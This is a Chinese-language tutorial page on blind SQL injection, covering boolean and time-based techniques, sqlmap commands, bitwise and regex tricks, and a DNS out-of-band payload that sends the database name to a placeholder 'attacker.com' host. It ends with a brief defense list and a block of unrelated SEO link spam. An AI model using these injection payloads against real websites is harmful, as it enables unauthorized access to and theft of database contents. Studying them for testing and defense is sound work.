当前位置: 首页 > wzjs >正文

网站建设网站免费广州seo怎么做

wzjs 2025/8/18 7:36:45
网站建设网站免费,广州seo怎么做,做淘宝优惠网站,交互设计作品集网站SQL注入之盲注技术详解 一、盲注基本概念盲注特点: 二、盲注主要类型1. 布尔盲注判断依据: 2. 时间盲注判断依据: 三、布尔盲注详细技术1. 识别布尔盲注2. 数据提取技术(1) 判断数据库类型(2) 获取数据库名长度(3) 逐字符获取数据库名(4) 获取…

SQL注入之盲注技术详解

  • 一、盲注基本概念
    • 盲注特点:
  • 二、盲注主要类型
    • 1. 布尔盲注
      • 判断依据:
    • 2. 时间盲注
      • 判断依据:
  • 三、布尔盲注详细技术
    • 1. 识别布尔盲注
    • 2. 数据提取技术
      • (1) 判断数据库类型
      • (2) 获取数据库名长度
      • (3) 逐字符获取数据库名
      • (4) 获取表名
      • (5) 自动化工具
  • 四、时间盲注详细技术
    • 1. 识别时间盲注
    • 2. 各数据库延时函数
    • 2. 数据提取技术
      • (1) 判断条件是否成立
      • (2) 逐位获取数据
      • (3) 使用case when语句
      • (4) 自动化工具
  • 五、盲注高级技巧
    • 1. 二分法加速盲注
    • 2. 位运算盲注
    • 3. DNS外带技术(OOB)
    • 4. 正则表达式盲注
  • 六、盲注防御措施

一、盲注基本概念

盲注(Blind SQL Injection)是一种特殊的SQL注入技术,当应用程序不会直接返回数据库错误信息或查询结果时使用。与常规注入不同,盲注需要通过应用程序的间接响应(如布尔状态、时间延迟)来推断数据。

盲注特点:

  • 无直接错误信息回显
  • 无查询结果直接显示
  • 需要通过逻辑判断或事件延迟获取数据
  • 攻击速度较慢但危害性相同

二、盲注主要类型

1. 布尔盲注

通过页面返回的真假状态判断SQL语句执行结果

判断依据:

  • 页面内容变化
  • http状态码变化
  • 返回数据长度变化

2. 时间盲注

通过数据库响应时间延迟判断SQL语句执行结果

判断依据:

  • 页面返回时间差异
  • 使用延时函数如sleep(),benchmark()

三、布尔盲注详细技术

1. 识别布尔盲注

测试语句:

id=1' and 1=1 --+  (返回正常页面)
id=1' and 1=2 --+  (返回异常或不同页面)

2. 数据提取技术

(1) 判断数据库类型

and (select count(*) from information_schema.tables)>0 -- MySQL
and (select count(*) from sysobjects)>0 -- SQL Server

(2) 获取数据库名长度

and length(database())=5 -- 判断当前数据库名长度是否为5

(3) 逐字符获取数据库名

and substr(database(),1,1)='a' -- 判断第一个字符是否为a
and ascii(substr(database(),1,1))=97 -- 判断第一个字符ASCII码是否为97(a)

(4) 获取表名

and (select count(*) from information_schema.tables where table_schema=database() and substr(table_name,1,1)='u')>0

(5) 自动化工具

使用sqlmap进行布尔盲注:

sqlmap -u "http://example.com/?id=1" --technique=B --dbs

四、时间盲注详细技术

1. 识别时间盲注

id=1' and sleep(5) --+  (观察响应是否延迟5秒)

2. 各数据库延时函数

数据库延时函数
MySQLSLEEP(5), BENCHMARK(1000000,MD5(1))
SQL ServerWAITFOR DELAY ‘0:0:5’
PostgreSQLpg_sleep(5)
OracleDBMS_LOCK.SLEEP(5)

2. 数据提取技术

(1) 判断条件是否成立

id=1' and if(ascii(substr(database(),1,1))=97,sleep(5),1) --+

(2) 逐位获取数据

id=1' and if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)>100,sleep(5),1) --+

(3) 使用case when语句

id=1' and (case when (ascii(substr(database(),1,1))=97) then sleep(5) else 1 end) --+

(4) 自动化工具

使用sqlmap进行时间盲注:

sqlmap -u "http://example.com/?id=1" --technique=T --dbs

五、盲注高级技巧

1. 二分法加速盲注

and ascii(substr(database(),1,1))>128  -- 高位判断
and ascii(substr(database(),1,1))>64   -- 中位判断
and ascii(substr(database(),1,1))>96   -- 低位判断

2. 位运算盲注

and (ascii(substr(database(),1,1))>>1)&1=1  -- 判断第一位

3. DNS外带技术(OOB)

-- MySQL (需要load_file权限)
and (select load_file(concat('\\\\',(select database()),'.attacker.com\\share\\')))

4. 正则表达式盲注

and (select database()) regexp '^a'  -- 判断数据库名是否以a开头

六、盲注防御措施

  1. 使用预编译语句
  2. 输入验证:
    白名单验证
    类型强制转换
  3. 错误处理:
    同意错误页面
    不返回详细错误信息
  4. 权限控制:
    最小权限原则
    禁用危险函数
  5. WAF防护:
    识别并拦截盲注特征
    频率限制
http://www.dtcms.com/wzjs/389715.html

相关文章:

  • 国办加强政府网站建设的意见网络推广公司电话
  • 温州市微网站制作多少钱免费seo提交工具
  • 自己怎么做VIP视频解网站东莞网站设计
  • ppt模板免费网站在线制作怎样把产品放到网上销售
  • 本墨陈黑做网站有版权谷歌seo排名
  • 福州网站运营百度营销登录
  • 网站备案未注销 影响代运营竞价公司
  • 网站建设四段合一关键词指数查询工具
  • 做网站都需要哪些软件搜索引擎竞价排名
  • 网站在线咨询系统电商平台怎么注册
  • 跟网站开发公司签合同主要要点百度统计api
  • 网站你懂我意思正能量免费软件优化大师
  • 怎么自做网站磁力王
  • 有网站代码怎么建站东莞网站建设推广公司
  • ps做分享类网站效果图怎样进行网络营销吸引顾客
  • 上海专业高端网站建设服务临沧seo
  • 公司建站新闻头条今日要闻10条
  • 美国做简历的网站班级优化大师怎么用
  • 丽水做网站企业seo的概念
  • 香港免备案域名注册标题关键词优化报价
  • 网站建设的六个步骤杭州seo排名费用
  • 一般网站做推广要多大的带宽和内存百度识图入口
  • 做网站哪些技术最全bt磁力搜索引擎索引
  • html网站怎么做的网站制作基本流程
  • 两学一做注册网站吗武汉十大技能培训机构
  • 佛山网约车驾驶证报名网站微信推广费用一般多少
  • wordpress网盘外链插件搜索引擎优化的作用
  • 网站建设实践考试试题seo推广的特点
  • 重庆做网站怎么做杭州seo网络公司
  • 动力 网站建设微博推广方法有哪些